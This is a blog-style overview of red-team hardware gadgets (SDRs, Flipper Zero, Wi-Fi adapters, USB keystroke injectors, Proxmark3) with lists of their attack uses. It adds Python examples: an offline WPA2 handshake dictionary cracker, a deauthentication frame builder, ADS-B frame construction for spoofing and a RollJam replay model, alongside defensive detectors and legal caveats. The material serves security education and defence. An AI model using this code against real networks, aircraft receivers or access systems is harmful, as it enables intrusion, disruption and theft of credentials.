Red Teamer Gadgets (Part 1)

19 August 2024 16 minutes Author: Lady Liberty

In the first part of our review we look at the main hardware gadgets red teamers use for security testing: software-defined radios, Wi-Fi adapters, RFID/NFC tools and USB keystroke injectors. Devices such as the Bash Bunny and USB Rubber Ducky let you automate attacks and run complex pentests; knowing what these tools can and cannot do is what lets you harden your organization against them.

Let’s start

Cybersecurity professionals known as red teamers use a variety of tools to simulate attacks and test organizations' defenses. The Hacker's Hardware Toolkit on GitHub, curated by yadox666, collects such devices. For example, Hak5's Bash Bunny and USB Rubber Ducky automate USB keystroke-injection attacks, while the WiFi Pineapple intercepts and manipulates wireless traffic, making it a staple of Wi-Fi security testing.

The toolkit also includes RF analysis devices such as the HackRF One, and the Proxmark3 for testing RFID/NFC systems. Raspberry Pi and Arduino boards are widely used to build custom tools for physical and network attacks. The collection shows that red team work relies on both off-the-shelf and customizable gadgets, which together cover the full range of a security assessment.

RTL-SDR v.3

RTL-SDR v.3 is a popular, inexpensive software-defined radio (SDR) receiver in USB-stick format, known for broad software compatibility and reliable performance. It is built around an RTL2832U demodulator and an R820T2 tuner, has a 1 PPM TCXO and an SMA female connector, and comes in an aluminium case that doubles as a passive heatsink. The tuner covers roughly 24 MHz to 1.7 GHz with up to 3.2 MHz of bandwidth (2.4 MHz is the rate that runs without dropped samples); in direct-sampling mode it also receives HF down to about 500 kHz, which is how the often-quoted 500 kHz to 1.7 GHz range is reached. It is receive-only; it cannot transmit.

RTL-SDR v.3 works on Windows, macOS, Linux and Android and is supported by numerous SDR applications such as SDR#, HDSDR, SDR-Radio, GQRX and SDR Touch. It is well suited to radio scanning, air traffic monitoring, public safety monitoring, ADS-B reception, radio astronomy and many other tasks, and serves as an inexpensive panadapter for radio amateurs.

The V3 revision brought several upgrades: the improved R820T2 tuner, the 1 PPM TCXO, a low-noise PCB, better cooling, additional ESD protection, and a software-switchable bias tee that can power active antennas and LNAs.

Attack scenario:

Red teams use the RTL-SDR v.3 to receive and analyze wireless traffic within its frequency range. During an engagement it lets you capture unencrypted transmissions such as aviation systems, public safety channels or trunked radio networks. With the right software, red teamers can monitor these communications in real time, identify weaknesses, potentially obtain sensitive information, and detect unauthorized transmissions or jamming, improving situational awareness. Interception of third-party radio traffic is regulated in most jurisdictions, so these scenarios belong inside the agreed scope of an engagement.

List of red team attacks

  1. Interception of air traffic control voice: Capture and analyze the unencrypted AM voice channels used between controllers and aircraft to gather flight intelligence.

  2. Monitoring public safety channels: Listen to police, fire and EMS traffic that is still carried in the clear for real-time operational details.

  3. ADS-B aircraft tracking: Track aircraft movements in real time. ADS-B is unencrypted and unauthenticated, but it carries position, altitude, velocity and callsign, not flight plans or cargo manifests; those have to be correlated from other sources.

  4. Trunked radio systems: Follow control channels and decode traffic on trunked networks used by large organizations and government agencies (for example with SDRTrunk or OP25).

  5. P25/MotoTRBO digital voice: Decode unencrypted digital voice. Encrypted talkgroups can be identified and logged but not decoded without the key.

  6. ACARS data collection: Extract messages from the Aircraft Communications Addressing and Reporting System for flight data analysis.

  7. Weather balloon telemetry: Receive and decode radiosonde telemetry to study environmental monitoring systems.

  8. NOAA APT / Meteor M2 satellites: Capture and decode meteorological satellite imagery.
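
The ADS-B item above is usually the first thing this dongle is used for, and it is also where the HackRF spoofing scenario later on this page comes from: the frames carry a CRC but no authentication. The following is an added example, not code from this article or from dump1090; it checks a Mode S DF17 frame's CRC-24 and decodes the callsign from an aircraft-identification message. The sample frame is a widely published test vector rather than a live capture, and the function names are mine.

```python
"""ADS-B (Mode S DF17) frame check and callsign decode.

Added example for this article, not code from the page or from dump1090.
The sample frame is a commonly published test vector (callsign "KLM1023_");
dump1090 on an RTL-SDR emits frames in the same 28-hex-digit form.
"""

CRC_POLY = 0xFFF409  # low 24 bits of the Mode S generator 0x1FFF409
# 6-bit character set of the aircraft identification message (type codes 1-4)
CALLSIGN_CHARS = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"

SAMPLE_FRAME = "8D4840D6202CC371C32CE0576098"  # published test vector, not a live capture


def hex_to_bits(hexstr):
    """Expand a hex string into a list of bits, most significant bit first."""
    return [int(b) for b in bin(int(hexstr, 16))[2:].zfill(len(hexstr) * 4)]


def crc24(bits):
    """Remainder of the bit string, read as a polynomial, modulo the Mode S generator."""
    reg = 0
    for bit in bits:
        top = (reg >> 23) & 1
        reg = ((reg << 1) | bit) & 0xFFFFFF
        if top:
            reg ^= CRC_POLY
    return reg


def parity(data_hex):
    """Parity field for an 88-bit DF17 payload: CRC over the data followed by 24 zero bits."""
    return crc24(hex_to_bits(data_hex) + [0] * 24)


def build_frame(data_hex):
    """Append the parity field; this is all a spoofer needs, since ADS-B has no authentication."""
    return data_hex.upper() + f"{parity(data_hex):06X}"


def verify(frame_hex):
    """A 112-bit DF17 frame is intact when the CRC over the whole frame is zero."""
    return len(frame_hex) == 28 and crc24(hex_to_bits(frame_hex)) == 0


def bits_to_int(bits):
    return int("".join(map(str, bits)), 2)


def decode_identification(frame_hex):
    """Parse downlink format, ICAO address, type code and, for type codes 1-4, the callsign."""
    bits = hex_to_bits(frame_hex)
    me = bits[32:88]  # 56-bit message field
    result = {
        "df": bits_to_int(bits[0:5]),
        "icao": frame_hex[2:8].upper(),
        "tc": bits_to_int(me[0:5]),
        "crc_ok": verify(frame_hex),
    }
    if 1 <= result["tc"] <= 4:
        chars = me[8:56]  # eight 6-bit characters
        result["callsign"] = "".join(
            CALLSIGN_CHARS[bits_to_int(chars[i:i + 6])] for i in range(0, 48, 6)
        )
    return result


if __name__ == "__main__":
    print(decode_identification(SAMPLE_FRAME))
    print("rebuilt frame matches:", build_frame(SAMPLE_FRAME[:22]) == SAMPLE_FRAME)
```

Run it and the decoder returns DF 17, ICAO 4840D6, type code 4 and callsign KLM1023_. The same `parity()` call that verifies a received fr frame is everything a transmitter needs to make a forged position report pass a receiver's CRC check, which is why receivers that want to resist spoofing correlate ADS-B against independent data (multilateration, primary radar) rather than trusting the frame.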

HackRF One

The HackRF One from Great Scott Gadgets is an open-source software-defined radio (SDR) that can both transmit and receive from 1 MHz to 6 GHz. It is half-duplex (it transmits or receives, never both at once) and samples at up to 20 million samples per second, with software-controlled RX and TX gain. It works with GNU Radio, SDR# and other common SDR software, has SMA antenna and clock-synchronization connectors, and runs either tethered to a host over USB or standalone with the PortaPack add-on.

Attack scenario:

Red teams reach for the HackRF One when a test needs transmission, which a receive-only dongle such as the RTL-SDR cannot do. It can spoof signals, for instance injecting fake ADS-B position reports into an aircraft-tracking receiver, jam or disrupt wireless systems such as Wi-Fi or Bluetooth, and perform replay attacks that grant access to systems relying on static codes. These capabilities make it a powerful tool for finding and exploiting weaknesses in radio systems. Transmitting on licensed or safety-of-life bands (aviation, public safety, GNSS) is illegal almost everywhere, so such tests are run into a shielded enclosure or over a direct cable to the device under test, never over the air.

List of red team attacks

  • Signal spoofing: Transmit forged signals to mislead a receiver, for example fake ADS-B aircraft positions or GPS signals, against a test receiver in a shielded setup.

  • Jamming attacks: Disrupt communication channels such as Wi-Fi, Bluetooth or public safety frequencies by transmitting interference; in practice only against lab equipment, because of both the law and the collateral damage.

  • Replay attacks: Record a legitimate transmission and retransmit it, which opens fixed-code systems such as older garage doors and gates. Modern keyless-entry systems use rolling codes, where a naive replay fails and the attacker needs a jam-and-capture ("RollJam") approach.

  • Wireless protocol analysis: Capture and analyze the target's wireless communications to identify weaknesses.

  • SDR application testing: Develop and test custom radio applications or proof-of-concept experiments against specific radio technologies.

  • Frequency-hopping attacks: Analyze frequency-hopping spread spectrum (FHSS) systems; within the HackRF's 20 MHz instantaneous bandwidth several channels can be observed at once while attempting to follow the hop sequence.

  • RFID and NFC: Observe 13.56 MHz NFC communication at the RF level for protocol analysis or data extraction where a dedicated reader is not flexible enough.

  • Broadcast signal manipulation: Inject false information into broadcast systems such as FM radio (including RDS data) or digital television, again only in a shielded environment.

  • Remote control interception: Capture and clone the signals of fixed-code remote controls for devices such as garage doors or drones.

Flipper Zero

Flipper Zero is a compact multi-tool for hackers, pentesters and electronics enthusiasts. It has a 125 kHz RFID reader/emulator, a 13.56 MHz NFC reader/emulator, an infrared transceiver, a sub-1 GHz radio (CC1101), GPIO pins, a 1-Wire/iButton interface and Bluetooth LE. The firmware is open source, so the device can be customized and extended to specific needs. It is used for cloning access cards, capturing IR signals, and recording and replaying sub-GHz signals, which makes it a handy tool for security testing.

Attack scenario:

Red teams use the Flipper Zero to clone RFID and NFC cards, capture infrared signals, and record and replay sub-GHz signals. Replay works against fixed-code remotes; rolling-code systems such as most car keys reject a replayed packet. Its flexibility lets you interact with a wide range of electronic systems and test them for weaknesses.

List of red team attacks

  1. RFID cloning: Read 125 kHz cards (EM4100, HID Prox, Indala and others) and emulate them or write them to blank T5577 cards to gain access to secured areas.

  2. NFC manipulation: Read, write and emulate 13.56 MHz tags to interact with access control systems. MIFARE Classic keys can be recovered with the device's key dictionary and nested attacks; contactless payment cards can be read but not cloned, because the EMV transaction is cryptographically authenticated.

  3. Infrared signal replication: Capture and transmit infrared remote-control signals to control devices with an IR receiver.

  4. Sub-GHz interception: Use the sub-1 GHz transceiver (300-348, 387-464 and 779-928 MHz) to capture and analyze wireless communications for weaknesses.

  5. Replay attacks: Record and play back signals from keyless entry systems; this succeeds against fixed-code receivers and fails against rolling codes unless the original transmission was kept from reaching the receiver.

  6. GPIO interface: Connect to and drive electronic systems through the GPIO pins (UART, SPI, I2C) for hardware testing.

  7. Custom firmware: Build and deploy custom firmware or apps to extend the Flipper Zero for specific scenarios.

  8. Signal jamming: Sometimes listed, but the sub-GHz radio is low-power and the official firmware restricts transmission to regionally permitted bands, so it is not a practical jammer.

  9. Bluetooth: The BLE radio serves the companion app and can act as a BLE peripheral (for example a keyboard for keystroke injection in some firmware builds); it does not sniff or intercept other devices' Bluetooth connections.
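
The HackRF One's replay and remote-control items and the Flipper Zero's replay item above all hinge on one distinction: a fixed-code receiver accepts any recording, a rolling-code receiver does not. The block below is an added example, not code from the article, the Flipper firmware or any HackRF tool, that models both receiver types and walks through a plain replay and the jam-and-capture sequence known as RollJam, which is what a transmit-capable radio adds over a receiver. The rolling-code scheme is deliberately simplified: an HMAC over serial and counter stands in for the KeeLoq cipher, and the key, serial, codes and 16-entry look-ahead window are made-up lab values.

```python
"""Replay against a fixed-code and a rolling-code receiver.

Added example, not code from the article, the Flipper firmware or any HackRF
tool. Simplified model: HMAC over (serial, counter) stands in for the KeeLoq
cipher; keys, serials and codes below are made-up lab values.
"""
import hashlib
import hmac


class FixedCodeReceiver:
    """EV1527/PT2262-class receiver: a static code, nothing else to check."""

    def __init__(self, code):
        self.code = code

    def accept(self, packet):
        return packet == self.code


def rolling_tag(key, serial, counter):
    """Authentication tag the receiver expects for a given counter value."""
    msg = serial.to_bytes(4, "big") + counter.to_bytes(2, "big")
    return hmac.new(key, msg, hashlib.sha256).digest()[:4]


class RollingCodeFob:
    def __init__(self, key, serial):
        self.key, self.serial, self.counter = key, serial, 0

    def press(self):
        self.counter += 1
        return (self.serial, self.counter, rolling_tag(self.key, self.serial, self.counter))


class RollingCodeReceiver:
    """Accepts only a fresh counter inside a look-ahead window, then burns it."""

    WINDOW = 16  # assumption: how many missed presses the receiver tolerates

    def __init__(self, key, serial):
        self.key, self.serial, self.counter = key, serial, 0

    def accept(self, packet):
        serial, counter, tag = packet
        if serial != self.serial:
            return False
        if not (self.counter < counter <= self.counter + self.WINDOW):
            return False  # stale (replayed) or too far ahead
        if not hmac.compare_digest(tag, rolling_tag(self.key, serial, counter)):
            return False  # forged without the key
        self.counter = counter
        return True


def demo():
    """Outcomes of the attacks an SDR operator can try; the values are the receivers' decisions."""
    results = {}

    # Fixed code: the radio records one button press, and the recording opens the gate forever.
    gate = FixedCodeReceiver(code=0x5A3C96)
    recording = 0x5A3C96
    results["fixed_replay"] = gate.accept(recording)

    # Rolling code, plain replay: the owner's press reached the car and advanced the counter.
    key, serial = bytes(range(16)), 0x1234ABCD
    fob, car = RollingCodeFob(key, serial), RollingCodeReceiver(key, serial)
    p1 = fob.press()
    car.accept(p1)                      # legitimate unlock, also recorded by the attacker
    results["rolling_replay"] = car.accept(p1)

    # Forgery without the key is rejected even with a fresh counter value.
    results["rolling_forged"] = car.accept((serial, car.counter + 1, b"\x00" * 4))

    # RollJam: jam so the car never hears presses 2 and 3 while recording both,
    # replay press 2 at once (the owner sees the car open) and keep press 3.
    p2, p3 = fob.press(), fob.press()
    results["rolljam_first"] = car.accept(p2)
    results["rolljam_saved"] = car.accept(p3)   # used later by the attacker
    results["rolljam_reuse"] = car.accept(p3)   # a burned counter stays burned
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16s} {'ACCEPTED' if ok else 'rejected'}")
```

The model explains the two outcomes a red teamer sees in the field: a gate on a fixed-code remote opens on a replay, a car does not, and only a jam-and-record attack, which needs a transmitter, yields a usable code. It also tells the defender what to verify in a receiver: a bounded counter window, a tag check before the counter moves, and no acceptance of stale counters.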

M5StickC Plus

The M5StickC Plus is a compact development board from M5Stack based on the ESP32-PICO microcontroller with Wi-Fi and Bluetooth. It has a 1.14-inch TFT display, a 6-axis IMU, a built-in battery and a handful of GPIO pins on its header and Grove connector. With Arduino, MicroPython and UIFlow support it suits IoT projects and rapid prototyping, and the ESP32 Marauder firmware has a build for it.

Attack scenario:

With community firmware such as ESP32 Marauder, the M5StickC Plus can stand up rogue Wi-Fi access points, run deauthentication attacks (Espressif's SDK blocks raw deauthentication frames, so the firmware bypasses that check), scan and spoof BLE advertisements, and talk to hardware directly over GPIO. It cannot intercept established Bluetooth connections.

List of red team attacks

  1. Fake access point: Host a rogue access point with a captive portal to capture credentials or observe client traffic.

  2. Wi-Fi deauthentication attack: Disconnect clients by sending forged deauthentication frames; ineffective against networks that enforce Protected Management Frames (802.11w).

  3. BLE advertisement spoofing: Scan for and spoof Bluetooth LE advertisements (for example flooding phones with pairing pop-ups); the ESP32 cannot intercept existing Bluetooth connections.

  4. Custom payload deployment: Program the board with custom scripts for automated attacks on network systems.

  5. Hardware manipulation: Use the GPIO pins to interact with and drive hardware such as sensors or control units.

  6. Credential collection: Collect and store credentials captured by the rogue access point or portal.

  7. Network scan: Scan Wi-Fi and BLE to enumerate devices and networks in range.

  8. Sensor spoofing: Feed false data into systems that rely on sensor input over GPIO or wireless.

  9. Data exfiltration: Use Wi-Fi or Bluetooth to move captured data off a compromised system.

Digispark ATTINY85 Micro USB Dev Board (Arduino)

The Digispark ATTINY85 Micro USB Dev Board is a small, low-cost board built around the ATtiny85 microcontroller, with a micro-USB connector for programming and power, six I/O pins and Arduino IDE support. It has no hardware USB controller: USB is bit-banged by the V-USB stack, which is why the Digispark core clocks the chip at 16.5 MHz from its internal oscillator. Only about 6 KB of flash remains after the Micronucleus bootloader, and the bootloader waits several seconds at power-up before the sketch starts.

Attack scenario:

Red teams use the Digispark as a covert keystroke-injection device: it enumerates as a USB keyboard and types commands or installs malware, and its size makes it easy to hide in a case or a cable. The DigiKeyboard library assumes a US keyboard layout, so payloads have to be adapted for hosts with other layouts.

List of red team attacks

  1. HID injection attack: Program the board to act as a USB keyboard that injects keystrokes to execute commands or scripts on the target system.

  2. Credential harvesting: Type commands that open a terminal or browser and dump credentials or other sensitive information to a location the attacker controls.

  3. Deploying malware: Type a download-and-execute one-liner that fetches and runs a payload.

  4. Data exfiltration: Type commands that read sensitive files and send them out by email or to a cloud service. The keyboard is output-only; the device itself cannot read anything back from the host.

  5. Automated exploits: Launch payloads that exploit known vulnerabilities on the target system.

  6. Network configuration manipulation: Change network settings, for example DNS or proxy configuration, on the target system.

  7. Phishing attacks: Open a phishing site or fake login page through typed keystrokes to capture user credentials.

  8. System reconfiguration: Weaken security settings or establish persistence for later access.

  9. Wireless network attacks: Pair the board with an external Wi-Fi or Bluetooth module to perform attacks such as rogue access points or deauthentication.
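
The one thing a keystroke injector cannot fake is human timing: DigiKeyboard types a payload at a fixed, superhuman rate unless the author deliberately slows it down. The block below is an added example, not code from this article or any Digispark project: a detector that flags an input device whose median inter-key gap over a run of keys is below what a person produces. The event stream is constructed in-script; in production the same (timestamp, device) pairs come from evdev on Linux or a raw-input hook on Windows, and both thresholds are assumptions to tune for the environment.

```python
"""Keystroke-rate heuristic for spotting a scripted USB keyboard.

Added example, not code from the article or any Digispark project. The event
stream is constructed in-script; on Linux the same (timestamp, device) pairs
come from evdev, on Windows from a raw-input hook. Both thresholds are
assumptions to tune per environment.
"""
from statistics import median

HUMAN_MIN_INTERVAL_S = 0.03  # assumption: a sustained median under 30 ms between keys is not human
MIN_RUN = 12                 # assumption: judge only after this many keys from one device


def flagged_devices(events, min_interval=HUMAN_MIN_INTERVAL_S, min_run=MIN_RUN):
    """events: iterable of (timestamp_s, device_id) key-down events.

    Returns {device_id: fastest median gap} for devices that typed any run of
    min_run keys with a median inter-key gap below min_interval.
    """
    stamps_by_dev = {}
    for ts, dev in events:
        stamps_by_dev.setdefault(dev, []).append(ts)
    flagged = {}
    for dev, stamps in stamps_by_dev.items():
        stamps.sort()
        for end in range(min_run, len(stamps) + 1):
            run = stamps[end - min_run:end]
            gap = median(b - a for a, b in zip(run, run[1:]))
            if gap < min_interval:
                flagged[dev] = min(flagged.get(dev, gap), gap)
    return flagged


def constructed_capture():
    """Made-up capture: a person, a short burst from a macro pad, and an injector."""
    events = []
    # human: 30 keys with jittery 80-220 ms gaps
    t = 0.0
    for i in range(30):
        t += (0.08, 0.14, 0.22, 0.11)[i % 4]
        events.append((t, "builtin-keyboard"))
    # legitimate macro pad: 8 keys at 10 ms, too short a run to judge
    t = 10.0
    for _ in range(8):
        t += 0.01
        events.append((t, "macro-pad"))
    # keystroke injector: a 60-key payload typed at 5 ms per key
    t = 20.0
    for _ in range(60):
        t += 0.005
        events.append((t, "hid-injector"))
    return events


def demo():
    return flagged_devices(constructed_capture())


if __name__ == "__main__":
    print(demo())
```

A payload that inserts `DigiKeyboard.delay()` between keystrokes evades this heuristic, so treat it as one layer; device allow-listing (for example USBGuard on Linux) is the control that does not depend on timing.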

Alfa AWUS-036ACH

The Alfa AWUS-036ACH is a high-performance dual-band USB Wi-Fi adapter for 2.4 GHz and 5 GHz, built on the Realtek RTL8812AU chipset. It supports 802.11ac with up to 300 Mbps on 2.4 GHz and 867 Mbps on 5 GHz, connects over USB 3.0 and has two high-gain detachable antennas. It works with Windows, macOS and Linux; for monitor mode and packet injection on Linux it needs the out-of-tree aircrack-ng rtl8812au driver, and 5 GHz injection support depends on the driver version.

Attack scenario:

Red teams use the Alfa AWUS-036ACH for Wi-Fi attacks: packet capture and analysis, handshake capture and weakness discovery. With 2.4 GHz and 5 GHz support it can probe both bands, host rogue access points, and perform man-in-the-middle attacks that intercept and manipulate user traffic.

List of red team attacks

  1. Packet sniffing: Capture and analyze traffic in monitor mode for sensitive information, credentials or weaknesses.

  2. Fake hotspot: Host a rogue access point to intercept and manipulate the traffic of users who connect.

  3. Deauthentication attack: Disconnect clients by injecting deauthentication frames; blocked by Protected Management Frames (802.11w), which WPA3 makes mandatory.

  4. Man-in-the-middle (MITM) attack: Interpose on traffic between devices on a network to steal data or inject malicious content.

  5. Evil twin attack: Clone the SSID of a legitimate network to lure users onto a malicious access point.

  6. Channel flooding: A Wi-Fi adapter cannot transmit raw noise; what passes for "jamming" here is flooding a channel with management frames (deauthentication, CTS) to cause denial of service.

  7. Credential harvesting: Collect logins and other sensitive data from intercepted traffic.

  8. WEP/WPA/WPA2 cracking: Recover WEP keys from captured traffic, or capture a WPA/WPA2 4-way handshake (or PMKID) and run an offline dictionary attack against the passphrase; WPA3-SAE is designed to resist offline guessing.

  9. Network scan: Enumerate nearby networks, clients and their security configuration for later reference.
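
Item 8 is where passphrase strength actually gets tested. The block below is an added example, not code from the article or from aircrack-ng; it implements the WPA2-PSK derivation chain (PBKDF2 PMK, PRF-512 PTK, EAPOL MIC) and runs a dictionary attack against a 4-way-handshake message 2 that the script constructs itself from made-up MAC addresses, nonces, SSID and passphrase. A real capture from airodump-ng (the handshake a deauthentication attack forces a client to repeat) supplies the same fields.

```python
"""WPA2-PSK key derivation, handshake MIC check and offline dictionary attack.

Added example, not code from the article or from aircrack-ng. The handshake is
constructed in-script (made-up MACs, nonces, SSID and passphrase) so it runs
offline; a capture from airodump-ng supplies the same fields.
"""
import hashlib
import hmac

# Offset of the Key MIC field in an EAPOL-Key frame: EAPOL header (4) + descriptor
# type (1) + key info (2) + key length (2) + replay counter (8) + nonce (32) +
# IV (16) + RSC (8) + key ID (8) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the only slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512 'Pairwise key expansion'. Bytes 0-15 of the result are the KCK that keys the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP MIC: HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce, kck):
    """Constructed EAPOL-Key message 2 (client -> AP): carries the SNonce and the first MIC."""
    body = (
        b"\x02"                   # descriptor type: RSN
        + b"\x01\x0a"             # key info: pairwise, MIC present, HMAC-SHA1 (version 2)
        + b"\x00\x10"             # key length
        + b"\x00" * 7 + b"\x01"   # replay counter
        + snonce
        + b"\x00" * 16            # key IV
        + b"\x00" * 8             # key RSC
        + b"\x00" * 8             # key ID
        + b"\x00" * 16            # MIC, filled in below
        + b"\x00\x00"             # key data length
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed lab handshake (all values made up).
SSID = "LabNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse"


def captured_msg2():
    """What the client would send for TRUE_PASSPHRASE; stands in for a sniffed frame."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, kck)


def demo(wordlist=("password", "LabNet123", "correct horse", "hunter2")):
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_msg2(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The cost of the attack is the PBKDF2 step, 4096 SHA-1 rounds per candidate, which is why GPUs and hashcat matter; everything after it is cheap. To confirm the derivation, `pmk_from_passphrase("password", "IEEE")` should return the PMK from the standard's own test vector, `f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e`. WPA3-SAE replaces the PSK handshake with a password-authenticated key exchange, so a captured exchange gives an attacker nothing to guess against offline.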

Wi-Fi Deauther

The Wi-Fi Deauther is a compact ESP8266-based device for selectively disconnecting clients from 2.4 GHz Wi-Fi networks. It sends forged deauthentication frames, which works because 802.11 management frames are unauthenticated unless Protected Management Frames (802.11w) is enabled; the effect is targeted rather than broadband interference. It comes with an OLED display, an 18650 battery charger and the ESP8266 Deauther firmware pre-installed, and is a handy tool for network testing.

Attack scenario:

Red teamers use the Wi-Fi Deauther for targeted attacks, disconnecting specific devices to test network resilience or to force a reconnection and capture the WPA/WPA2 handshake. Its compact size and display make it convenient for covert operations and monitoring. Against a network that enforces 802.11w the attack simply fails, which is itself a useful finding.

List of red team attacks

  1. Deauthentication attack: Disrupt connectivity for target devices by sending deauthentication frames, causing them to disconnect from the network.

  2. Handshake capture: Force clients to reconnect and capture the WPA/WPA2 4-way handshake for offline cracking.

  3. Targeted network disruption: Disable specific devices without affecting the whole network, useful for isolating and testing individual systems.

  4. Client-side denial of service: Repeatedly deauthenticate certain clients so they can never hold a stable connection.

  5. Rogue access point detection: The firmware's scanner lists nearby access points and clients; compare the BSSIDs against the known inventory to spot unauthorized access points.

  6. Access point testing: Assess how access points handle deauthentication and whether they enforce 802.11w.

  7. Security training: Demonstrate the impact of deauthentication attacks in training sessions to educate users about Wi-Fi security.

  8. Network reconnaissance: Identify active clients and the access points they are associated with from probe and data frames.

  9. Evasion tactic: Temporarily knock Wi-Fi-connected security cameras or other monitoring devices offline. Wired or PMF-protected devices are unaffected.
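
Deauthentication is listed for the M5StickC Plus, the Alfa adapter and this device, so it is worth seeing the frame itself. The block below is an added example, not code from the article or from the ESP8266 Deauther firmware: it builds a deauthentication frame byte for byte, parses it back, and runs a rate-based detector over a constructed capture, since the attacker spoofs the access point's own MAC address and only the frame rate gives the attack away. All MAC addresses and timings are made up.

```python
"""802.11 deauthentication frame: construction, parsing and a burst detector.

Added example, not code from the article or the ESP8266 Deauther project.
Frames are constructed in-script with made-up MAC addresses; in practice they
come from a monitor-mode capture and the detector runs over that.
"""
import struct
from collections import defaultdict

FC_DEAUTH = 0x00C0      # frame control: type 0 (management), subtype 12 (deauth); bytes C0 00 on the wire
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
REASON_CLASS3 = 7       # "class 3 frame received from nonassociated STA", the usual deauther choice
HDR = "<HH6s6s6sH"      # frame control, duration, addr1, addr2, addr3, sequence control


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3, seq=0):
    """24-byte management header plus the 2-byte reason code (no FCS; drivers usually strip it)."""
    header = struct.pack(HDR, FC_DEAUTH, 0x013A, mac_bytes(dst), mac_bytes(src),
                         mac_bytes(bssid), (seq << 4) & 0xFFFF)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame):
    """Decode the header fields; for deauth/disassoc also the reason code."""
    fc, _duration, a1, a2, a3, seqctl = struct.unpack_from(HDR, frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3),
        "seq": seqctl >> 4,
    }
    if info["type"] == 0 and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(capture, window_s=1.0, threshold=10):
    """Flag (src, bssid) pairs that sent >= threshold deauth/disassoc frames within any window_s.

    The attacker spoofs the AP's address, so the MAC itself tells you nothing; the rate does.
    """
    times_by_sender = defaultdict(list)
    for ts, frame in capture:
        p = parse_mgmt(frame)
        if p["type"] == 0 and p["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            times_by_sender[(p["src"], p["bssid"])].append(ts)
    alerts = {}
    for sender, times in times_by_sender.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while times[start] < t - window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[sender] = max(alerts.get(sender, 0), count)
    return alerts


def demo():
    """Constructed capture: one legitimate deauth, then a deauther impersonating the AP."""
    ap, victim = "aa:bb:cc:dd:ee:ff", "10:20:30:40:50:60"
    capture = [(0.0, build_deauth(victim, ap, ap, reason=4))]  # reason 4: inactivity timeout
    capture += [(5.0 + i * 0.02, build_deauth(victim, ap, ap, seq=i)) for i in range(30)]
    return detect_deauth_flood(capture)


if __name__ == "__main__":
    print(demo())
```

Wireless intrusion detection products flag deauth floods with exactly this kind of per-sender rate threshold. The fix, rather than detection, is Protected Management Frames (802.11w): with PMF enforced, a client discards a deauthentication frame whose MIC it cannot verify, and the Deauther achieves nothing.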

Proxmark3-EVO

Proxmark3-EVO is a dedicated tool for analyzing and testing RFID systems at both low frequency (125/134 kHz) and high frequency (13.56 MHz). It is built around an AT91SAM7S512 ARM microcontroller with an FPGA handling the RF front end, has internal and external memory, and comes with antennas for LF and HF. It can read, write, clone, emulate, sniff and analyze RFID cards and tags.

Attack scenario:

Red teams use the Proxmark3-EVO to clone RFID cards, sniff reader-to-card traffic and run cryptographic attacks (for example the darkside, nested and hardnested attacks on MIFARE Classic's Crypto-1 cipher), gaining unauthorized access to secured areas or extracting sensitive data.

List of red team attacks

  1. RFID cloning: Clone RFID cards to gain unauthorized access to secured areas or facilities.

  2. RFID emulation: Emulate cards directly from the device to impersonate legitimate users and bypass access control systems.

  3. Signal replay: Capture and replay LF card transmissions. LF cards such as EM4100 and HID Prox broadcast a static ID with no challenge, so a replay is indistinguishable from the real card.

  4. RFID sniffing: Place the antenna between reader and card to capture the data exchanged, including the reader nonces used in later key attacks.

  5. Cryptographic attacks: Recover keys from weak ciphers such as MIFARE Classic Crypto-1 (darkside, nested, hardnested) or legacy iClass, then authenticate as a valid card.

  6. Data extraction: Dump sensitive information stored on tags, such as personal or payment-related data.

